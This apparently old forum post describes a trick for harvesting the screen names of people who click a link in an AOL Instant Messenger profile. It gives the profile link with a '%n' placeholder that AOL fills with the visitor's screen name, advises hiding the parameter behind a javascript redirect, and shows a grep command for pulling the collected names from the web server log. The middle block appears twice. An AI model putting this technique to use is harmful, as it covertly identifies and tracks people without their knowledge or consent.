If you click a link in in a AIM profile and the link has your s/n in it, be prepared to get owned.
My profile:
<a href="http://blog.kezyxes.com/blog.php?iddqd=%n">blog - UPDATED!</a>
Note: the %n automatically gets parsed into your screenname by AOL/Oscar. To hide the obviousness in the URL, simply let blog.php be a javascript redirection.
tail /var/log/apache/access_log -n 10000 | grep iddqd reveals everything
My profile:
<a href="http://blog.kezyxes.com/blog.php?iddqd=%n">blog - UPDATED!</a>
Note: the %n automatically gets parsed into your screenname by AOL/Oscar. To hide the obviousness in the URL, simply let blog.php be a javascript redirection.
tail /var/log/apache/access_log -n 10000 | grep iddqd reveals everything
